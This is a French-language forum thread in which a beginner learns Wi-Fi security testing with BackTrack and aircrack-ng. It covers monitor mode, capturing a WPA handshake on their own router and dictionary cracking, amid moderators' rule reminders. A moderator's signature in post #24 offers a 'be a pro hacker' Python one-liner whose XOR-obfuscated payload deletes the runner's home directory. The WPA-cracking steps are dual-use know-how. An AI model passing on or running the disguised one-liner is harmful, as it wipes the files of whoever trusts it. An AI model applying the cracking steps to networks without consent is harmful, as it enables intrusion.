Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 11-08-2012 14:50:00

fifty_sec
Membre

Bien débuter

Bonjour à tous,

je me doute que je ne suis pas le premier à réaliser ce type de post, et je m'en excuse d'avance.

Donc, ça fait bien longtemps que je souhaite m’intéresser à la sécurité wifi mais j'ai toujours abandonner car les différents tutos que je trouvais sur internet me donnais des informations totalement différente. C'était assez déroutant, donc j'ai plusieurs fois laissé tomber. Actuellement j'ai un peu plus de temps libre donc je souhaite m'y intéresser.

Déjà la première chose qui me bloque c'est la compatibilité du matériel. Actuellement voilà le matériel qui est à ma disposition : Dell xps15z + clé xifi BeWan wi-fi USB54

Donc dîtes moi ce que je dois installer, et au cas échéant me conseiller dans l'achat d'une clé wifi.

Merci de votre aide.
Cordialement.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 11-08-2012 15:57:53

Carto_
Membre V.I.P.

Re : Bien débuter

Bonjour à toi fifty_sec !

Comme tu as du t'en rendre compte, beaucoup (vraiment beaucoup) de choses se passent sous Linux concernant la sécurité, et notamment ce qui touche aux réseaux. Aussi je ne peux que t'inviter à aller te pencher sur la question si tu ne connais bien Linux. Ubuntu est un très bon début, et ensuite basculer sous Backtrack pour une masse de tool OOTB impressionnante.

En ce qui concerne ta clé wifi, tu peux regarder ici si elle est compatible avec Backtrack :
-> http://wiki.backtrack-fr.net/index.php/ … _BackTrack

Si ce n'est pas le cas, je te conseille d'investir une trentaine d'euros dans une belle Alfa (bien que d'autres cartes fassent leur apparition depuis peu). [Un beau WRT54GL est très optionnel mais quand tu auras fait le tour avec ton Alfa, il peut être d'une grande aide pour te former]

Que veux-tu faire exactement ?

Bien à toi,

Carto_

--
Regarde au-delà de ce que tu vois
--

#3 11-08-2012 15:58:18

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Bonjouer et bienvenue fifty_sec smile
Si ton Dell a une carte interne tu n'auras probablement aucunes difficultés avec elle.

Déjà la première chose qui me bloque c'est la compatibilité du matériel. Actuellement voilà le matériel qui est à ma disposition : Dell xps15z + clé xifi BeWan wi-fi USB54

Pouquoi dis tu que tu "bloques" si tu n'as pas essayé? tongue
Documente toi, lis les sujets épinglés et lance toi (essaye avec backtrack, nous avons une section entièrement dédiée à cette distriubtion wink )
Si tu as un problème à un moment ou un autre, cherche un topic abordant le sujet en question dans notre forum et postes-y tes doutes si nécessaires. Au pire tu ouvres un nouveau thème.
Lis nos Règles pour comprendre comment nous fonctionnons. wink

#4 11-08-2012 17:01:50

fifty_sec
Membre

Tout d'abord merci de m'apporter votre soutien.

Carto, effectivement j'avais compris que Linux est essentiel dans ce domaine. Je connais Ubuntu de nom, par contre backtrack je l'ai découvert que récemment sur votre site et forum.
J'aimerais d'abord commencer par tester la fiabilité de ma box, après j'aimerais découvrir ce qu'on peut faire lorsque l'on maîtrise tout ça...

Kcdtv, pour ma carte interne à mon Dell elle a un problème. Quand j'ai acheté mon ordinateur, il y a une année de celà elle fonctionnait parfaitement et depuis 6 mois elle a de gros problème de reception. Il faut que je me situe à moins de 2 mètres de ma box pour recevoir le signal. Dell ne veulent pas la remplacer car selon eux elle fonctionne...
Bref c'est pourquoi j'utilise une clé wifi supplémentaire. Mais d'après ce que j'ai compris elle n'est pas compatible puisque je ne l'a retrouve pas dans la liste.

#5 11-08-2012 18:08:55

Caracole
Membre Actif

fifty_sec a écrit :

Mais d'après ce que j'ai compris elle n'est pas compatible puisque je ne l'a retrouve pas dans la liste.

Elle n'a peut-être pas été testée, essaye par toi-même et après on verra pour une autre clef wifi compatible. smile

#6 11-08-2012 18:56:27

fifty_sec
Membre

Ok ! Je viens de lancer le téléchargement de BackTrack 5 Gnome.

Je vais essayer de tester ça dans la soirée ! Merci bien.

#7 11-08-2012 18:58:03

kcdtv
Membre d'honneur

Même avec toute la bonne volonté du monde, c'est très difficile de tenir a jour et mettre au point une liste exhaustive de tous les produits d'hier et d'aujourd'hui existant sur le marché du wireless.
Par exemple le fabricant "Bewan" ne me dit pas grand chose...  Ce qui ne veut pas dire que ton dispositif ne soit pas compatible.
Commence par le début avant de te demander "si ton chipset est compatible ou non avec le mode monitor et si il injecte bien". wink
Ce sont des questions qui viendront à leur moment, une fois que tu te seras familiarisé un minimum avec linux et avec la suite aircrack-ngaircrack-ng
Ici tu as un tool qui te permet de monter des stick USB en mode live
Ubuntu peut faire parfaitement l'affaire pour une première prise de contact, tu as aussi Linux Mint qui me semble bien "acueillant", Fedora...
Une fois que tu es en mode live et que tu t'es familiarisé un opeu avec la distribution de ton choix, connecte le USB et rentre dans une console

lsusb

et poste le résultat ici qui est généralement suffisant pour savoir de quel chipset il s'agit.
Si tu pouvais au passage l'inclure dans le titre et modifier celui-ci afin qu'il soit "un peu plus descriptif" wink

PS: Je n'avais pas vu la réponse de caracole, je "poussois" le "essaye par toi-même"
plus_un

PS2: Je n'avais pas vu ta réponse, je poussois aussi ta décision, peu importe la distribution
plus_un

#8 11-08-2012 19:39:19

fifty_sec
Membre

Pas de soucis, je vous tiens au courant !

#9 11-08-2012 21:24:45

Carto_
Membre V.I.P.

C'est une liste non exhaustive mais:

1°) Comprendre un peu comment fonctionne Linux, notamment Ubuntu
http://www.siteduzero.com/tutoriel-3-12 … linux.html

2°) Installer Backtrack 5R3 (elle sort dans 3 jours)
Installation -> http://www.backtrack-linux.org/tutorials/
Pas mal de doc -> http://www.backtrack-linux.org/forums/forum.php
Et un petit Wiki -> http://www.backtrack-linux.org/wiki/index.php/Main_Page

3°) Acheter une carte wiFi compatible avec Backtrack et supportant l'injection de paquets

4°) Suivre les tutoriels de ce site (crack-wifi.com) afin de t'attaquer aux attaques sur du WEP / WPA

5°) Jouer, comprendre et apprendre avec Whireshark, Wifizoo, la suite dnssniff et les autres tools orientés réseau de Backtrack (HTTP harvesting & cie)

6°) Appréhender les attaques via SSLSTRIP en contournement HTTPS
(docu sur ce forum)

7°) Appréhender la construction de Rogue_AP et de HoneySpot
(docu sur ce forum)

* Il y a des milliers d'autres choses à apprendre / faire donc j'en oublie surement.
* Tu as de nombreux challenges pour apprendre, dont ceux de la board Zenk-Security que je t'invite à aller regarder
(notamment ceux de réseaux puisque ça semble t'intéresser)
* Metasploit sera pour plus tard mais te donnera aussi du fil à tordre wink

--
Regarde au-delà de ce que tu vois
--

#10 11-08-2012 21:45:03

fifty_sec
Membre

Merci bien Carto !
Ca me fait du travail tout ça !
Apparemment sous BackTrack y'a plein de possibilité, ça à l'air super interessant !

Merci encore pour toutes ses infos smile

#11 11-08-2012 21:53:24

fifty_sec
Membre

D'ailleurs petites questions, un peu plus haut j'ai expliqué mon problème avec ma carte interne :

Kcdtv, pour ma carte interne à mon Dell elle a un problème. Quand j'ai acheté mon ordinateur, il y a une année de celà elle fonctionnait parfaitement et depuis 6 mois elle a de gros problème de reception. Il faut que je me situe à moins de 2 mètres de ma box pour recevoir le signal. Dell ne veulent pas la remplacer car selon eux elle fonctionne...

Est-ce que quelqu'un a une idée, de ce que je pourrais faire pour essayer de fixé le problème ? J'ai restaurer mon ordinateur, ré-installer les drivers et ça ne fonctionne toujours pas comme avant.

Merci d'avance.

#12 11-08-2012 22:00:03

antares145
Membre d'honneur
Site Web

"Un topic = un problème", on va essayer de ne pas trop se disperser si tu veux bien wink

Commence par vérifier si tu as le même problème avec un autre OS, comme par exemple Ubuntu ou BackTrack. Oui, je sais t'es peut-être pas encore prêt pour ça, mais c'est la meilleure (et la seule ?) façon de vérifier que c'est pas un problème de Windows et/ou de son pilote...
- soit ça fonctionne correctement sous Linux et c'est Windows qui est à la ramasse
- soit ça fonctionne aussi mal et ta carte a un problème quoi qu'en disent les types de chez Dell...

Dans les 2 cas, il y a une solution simple : utilise une aytre carte Wifi wink En USB par exemple, mais tu peux aussi changer la carte interne du Dell contre un modèle plus performant. La Carte WiFi, c'est un des rares composants que tu peux encore changer sans (trop de) difficultés sur un portable smile

Si tu veux parler d'avantage de ce problème, merci d'ouvrir un nouveau topic

Dernière modification par antares145 (11-08-2012 22:00:54)

#13 11-08-2012 22:07:15

fifty_sec
Membre

Ok je te remercie !

Je vous tiens au courant du résultat.

#14 12-08-2012 18:18:51

fifty_sec
Membre

Messieurs bonjour,

j'ai donc testé aujourd'hui même BackTrack 5.
Et la première impression est sympa, j'avais des à priori énormes sur Linux, je pensais que toute les commandes devait être taper à la main mais c'est plutôt simple d'utilisation.

Ensuite j'ai commencé les test avec mes 2 carte wifi, donc ma carte wifi présente dans mon ordinateur (Dell) n'est pas détecté par iwconfig. Par contre mon autre carte, en USB wifi, est détecté. J'ai donc essayer la passer en mode monitor et de lancer airodump-ng. J'ai obtenu cette erreur :

[email protected]:~# airodump-ng --encrypt wep wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make
sure RFMON is enabled: run 'airmon-ng start wlan0

Après différentes recherches, j'ai avec ce tuto réussi à passer ce problème : http://taufanlubis.wordpress.com/2010/0 … y-problem/

Mais quand j'arrive à lancer la commande : airodump-ng --encrypt wep wlan0
Rien n'est détecté durant la recherche.

Donc j'en conclut que ma clé USB ne doit pas être compatible...

#15 12-08-2012 18:30:18

kcdtv
Membre d'honneur

kcdtv a écrit :

Une fois que tu es en mode live et que tu t'es familiarisé un peu avec la distribution de ton choix, connecte le USB et rentre dans une console

lsusb

et poste le résultat ici qui est généralement suffisant pour savoir de quel chipset il s'agit.
Si tu pouvais au passage l'inclure dans le titre et modifier celui-ci afin qu'il soit "un peu plus descriptif" wink

Et puisque tu es sous backtrack tu peux écrire en console directement

airmon-ng

tu obtiens ainsi une liste des chipstes présents compatibles avec le mode monitor.

#16 12-08-2012 18:43:47

fifty_sec
Membre

Voilà donc ce que je trouve après avoir tapé "airmon-ng"

Interface    Chipset        Driver

wlan0        Ralink 2573 USB    rt73usb - [phy1]

EDIT : Après avoir regardé la compatibilité sur le site d'aircrack, ma clé wifi devrait être compatible.

EDIT 2 : Sur le forum, j'ai trouvé ce topic : http://www.crack-wifi.com/forum/topic-7 … eseau.html
Qui a peut être un rapport avec mon problème. Ce serait un soucis de firmware...

Dernière modification par fifty_sec (12-08-2012 19:37:25)

#17 12-08-2012 21:02:24

fifty_sec
Membre

Re-bonsoir,

bon j'ai finalement réussi à détecter les différents réseaux qui m'entourent. J'ai donc suivi à la lettre le tuto de crack wpa du site crack-wifi.
Une seule chose bloque ma progression c'est le fait qu'il ne détecte aucune station.

#18 12-08-2012 22:32:03

kcdtv
Membre d'honneur

Tu as donc pris connaissance avc "airmon-ng start <interace>" wink
Par contre modifier le tire pour qu'il soit descriptif. respecter notre norme de 1 topic = 1 sujet et poser tes questions dans les rubriques appropriées (si tu as une question sur le crack de clef WPA, que fait elle dans une rubrique configuration/compatibilité?) n'a pas l'air de beaucoup te préoccuper... roll
Relis les sujets épinglés et tuto "crack clef WPA" et essaye de comprendre en quoi consiste l'idée de récupérer un handshake (ce que tu t'apprêtes à faire), le pourquoi et le comment, et tu devrais comprendre très vite pas toi même ce qu'est une STATION.
Dans tous les cas maintenant que ton adaptateur est bien passé en mode monitor, ça ne devrait plus se passer ici.

#19 12-08-2012 22:43:17

goliate
Membre Irremplaçable
Site Web

fifty_sec a écrit :

Re-bonsoir,

bon j'ai finalement réussi à détecter les différents réseaux qui m'entourent. J'ai donc suivi à la lettre le tuto de crack wpa du site crack-wifi.
Une seule chose bloque ma progression c'est le fait qu'il ne détecte aucune station.

Par contre lis bien les régles du forum "le piratage du wifi sans accord du propriaitaire et interdis sur notre forum".

Sinon si tu as un autre pc a disposition, tu le connecte en wifi et tu te télécharge une bonne grosse distibution Linux (Et oui on et contre le warez aussi,donc une distibution de linux).

Comme cela tu auras un client légitimes sur la box pour pouvoir ainsi tester la sécurité de ton wifi.

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#20 12-08-2012 23:09:11

fifty_sec
Membre

Bonsoir,

En effet j'ai compris que la station est un ordinateur relié au réseau.
Je viens de connecter un autre ordinateur, mais pour l'instant pas de handshake.
D'ailleurs, on est obligé d'arrêter et de recommencer les 2 commandes lors de la recherche du handshake ?

Ne t'inquiètes pas je connais vos règles et les lois qui régissent notre pays smile

En tout cas merci de votre aide.

EDIT 1 : Je viens d'arriver à trouver mon wpa handshake, mais je vais me coucher demain ce sera toujours le même ?
EDIT 2 : Par contre j'ai un petit problème avec une de vos règles, celle 1 problème = 1 topic. Par exemple, pour ma question dans l'EDIT 1, j'aurais dû créer un nouveau topic ?

Dernière modification par fifty_sec (13-08-2012 00:03:14)

#21 13-08-2012 06:07:50

goliate
Membre Irremplaçable
Site Web

fifty_sec a écrit :

Bonsoir,

En effet j'ai compris que la station est un ordinateur relié au réseau.
Je viens de connecter un autre ordinateur, mais pour l'instant pas de handshake.
D'ailleurs, on est obligé d'arrêter et de recommencer les 2 commandes lors de la recherche du handshake ?

Ne t'inquiètes pas je connais vos règles et les lois qui régissent notre pays smile

En tout cas merci de votre aide.

EDIT 1 : Je viens d'arriver à trouver mon wpa handshake, mais je vais me coucher demain ce sera toujours le même ?
EDIT 2 : Par contre j'ai un petit problème avec une de vos règles, celle 1 problème = 1 topic. Par exemple, pour ma question dans l'EDIT 1, j'aurais dû créer un nouveau topic ?

Je pense pas que pour ton édite tu soit obligé de recréer  un topic forcement (je laisse les modo te reponde)

Sinon pour y répondre oui ton handshake sera toujours bon, tu moment  ou tu n'as pas changer ta clé durant la nuit ^^.

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#22 13-08-2012 13:42:59

fifty_sec
Membre

Bonjour,

Merci de ta réponse. Je viens de tenter de lancer aircrack avec un dictionnaire trouver sur le forum, mais aircrack ne le détecte pas : Please specify a dictionnairy.
Mon fichier fait plus de 2gb et sur le forum j'ai vu un post où il disait que le dictionnaire devait etre inférieur à 2gb. J'ai donc essayer avec un petit dictionnaire et ça a marché.
Mais alors comment réduire la taille de mon autre dictionnaire pour que aircrack puisse le détecter ?

Merci d'avance

#23 13-08-2012 14:12:21

antares145
Membre d'honneur
Site Web

Au risque d'être désagréable, je vais le répéter encore une fois en insistant : "Une question => un topic"
Si les questions sont "proches" on peut les grouper mais là ça devient n'importe quoi !

Ta première question était "que dois-je installer et quel matériel acheter". Ensuite on est passé à "j'ai un problème avec ma carte interne". Puis tes problèmes de détection de matériel. Puis tes problèmes de détection de réseaux et de stations. Et là maintenant tu arrives avec des questions sur les dictionnaires roll

Rien que là, on aurait de quoi faire au moins 4 topics différents, et les dernières questions n'ont plus rien à voir avec la première. On t'a dit, redit et re-redit de ne pas tout poster ici, là tu abuses et tu risques juste de te faire verrouiller ton topic, voire même le ban si le modérateur est de mauvaise humeur.

Si tu veux continuer à poster ici, reviens au sujet de départ : comment bien commencer, avec quel matériel et quels logiciels. Si tu veux une aide pour le crack WPA, tu crées un AUTRE TOPIC (dans la bonne section, tant qu'à faire).

J'espère que là c'est clair...

Dernière modification par antares145 (13-08-2012 14:19:16)

#24 13-08-2012 14:26:57

spawn
Modérateur

+1 antares145 il est au-delà du statut de modo, il est aware.
Donc fifty_sec, quand on te dit quelque chose, tu écoutes (: (à plus forte raison que c'est pas un inconnu à 0 posts sans compétences qui te répond)

Et un dictionnaire peut faire la taille que tu veux.

Fais peut être un peu plus attention à ce que l'on te dit sur le fonctionnement de notre forum, c'est socialement important.

Tu as gagné un avertissement \o/ après c'est le mot aux parents big_smile

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#25 13-08-2012 14:37:30

fifty_sec
Membre

Ok.

Mais je comprends pas bien, pour moi ce topic c'est surtout le lieu où j'explique mon initiation etape par etape à Linux et BackTrack donc forcement ça touche a plein de choses différentes...
Vous préférez que je flood la création de topic plutôt que je post dans un topic créer à l'intention de mon initiation.

Bonne journée.

Annonce